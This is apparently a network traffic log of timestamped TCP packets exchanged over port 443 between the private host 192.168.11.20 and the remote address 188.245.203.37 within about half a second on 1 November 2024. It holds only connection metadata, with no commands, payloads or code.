Nov 1, 2024 20:58:33.378017902 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.378017902 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.378079891 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.378113985 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.378273964 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411185026 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.411253929 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.411420107 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411420107 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411420107 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411420107 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411492109 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.411528111 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411528111 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.411726952 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.445946932 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.445966959 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.446131945 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446131945 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446156979 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446156979 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446167946 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.446229935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446290016 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.446310043 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.481487989 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.481540918 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.481676102 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.481676102 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.481822014 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.481822014 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.481875896 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.482068062 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.511920929 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.512006044 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.512104988 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.512105942 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.512170076 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.512171030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.512209892 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.512237072 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.512362957 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.533025026 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.533082962 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.533220053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.533220053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.533334970 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.533375025 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.533529997 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.553985119 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.554073095 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.554250002 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.554250956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.554250956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.554311991 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.554333925 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.554533005 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.571759939 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.571842909 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.571980000 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.571980000 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.572046995 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.572074890 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.572119951 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.572274923 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.589708090 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.589792967 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.589903116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.589968920 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.590003967 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.590045929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.590215921 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.607945919 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.608059883 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.608233929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.608233929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.608288050 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.608311892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.608490944 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.623514891 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.623596907 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.623692036 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.623692036 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.623740911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.623811007 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.623833895 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.623989105 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637413979 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.637497902 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.637613058 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637614012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637655020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637655020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637677908 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.637769938 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.637842894 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.651567936 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.651628971 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.651763916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.651763916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.651808977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.651808977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.651833057 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.651858091 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.652002096 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.666234016 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.666316032 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.666404963 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.666449070 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.666449070 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.666475058 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.666554928 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.666716099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677386999 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.677469969 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.677602053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677602053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677650928 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677650928 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677679062 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.677701950 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.677829981 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691030979 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.691101074 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.691181898 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691227913 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691227913 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691251993 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.691276073 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691276073 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691325903 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.691421032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702035904 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.702097893 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.702183008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702183008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702227116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702227116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702227116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702255964 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.702280998 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702281952 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702281952 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702281952 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702356100 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.702436924 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.714620113 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.714678049 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.714843035 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.714843035 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.714904070 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.714904070 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.714932919 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.714963913 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.715226889 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.725860119 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.725917101 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.726095915 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.726095915 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.726231098 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.726281881 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.726543903 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.735991955 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.736053944 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.736208916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.736208916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.736265898 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.736265898 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.736298084 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.736320972 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.736488104 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747219086 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.747275114 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.747471094 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747471094 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747471094 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747534990 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.747566938 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747566938 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747566938 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.747778893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756500006 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.756571054 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.756726980 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756727934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756727934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756727934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756798029 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.756818056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756818056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.756978035 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.766172886 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.766244888 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.766383886 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.766506910 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.766506910 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.766563892 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.766783953 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775229931 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.775285959 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.775425911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775425911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775490999 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775490999 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775490999 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775527954 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.775552988 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.775753975 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.784914017 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.784985065 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.785131931 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.785132885 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.785197020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.785197020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.785197020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.785228968 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.785526037 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.792735100 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.792793989 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.792948961 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.792949915 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.793004036 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.793081045 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.793152094 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.800863981 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.800920010 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.801103115 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.801103115 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.801162004 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.801179886 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.801412106 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808393955 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.808450937 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.808597088 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808597088 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808660030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808660030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808660030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808660030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808660030 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808698893 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.808733940 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.808866024 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816627026 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.816699028 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.816838980 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816838980 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816889048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816889048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816889048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816889048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.816924095 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.817161083 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.823610067 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.823666096 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.823832989 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.823832989 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.823890924 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.823936939 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.823976994 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.824167013 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.830935955 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.830995083 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.831166029 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.831166029 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.831166029 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.831229925 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.831259966 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.831260920 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.831463099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.838500023 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.838570118 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.838788033 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.838788033 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.838788033 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.838845015 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.838871956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.839107037 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.845344067 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.845403910 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.845531940 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.845531940 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.845609903 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.845643044 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.845671892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.845881939 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852060080 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.852134943 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.852287054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852288008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852288008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852351904 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.852386951 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852387905 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.852603912 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857541084 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.857598066 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.857768059 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857769012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857769012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857834101 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857834101 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857835054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.857868910 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.858102083 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.864224911 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.864301920 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.864522934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.864522934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.864578009 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.864847898 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.869999886 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.870057106 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.870215893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.870217085 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.870281935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.870281935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.870282888 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.870315075 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.870635986 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.876303911 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.876384974 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.876549006 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.876549959 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.876604080 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.876646042 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.876646042 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.876900911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.882106066 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.882185936 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.882333994 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.882375956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.882375956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.882409096 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.882601023 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.887362003 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.887419939 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.887622118 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.887623072 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.887676954 CET	443	58990	188.245.203.37	192.168.11.20
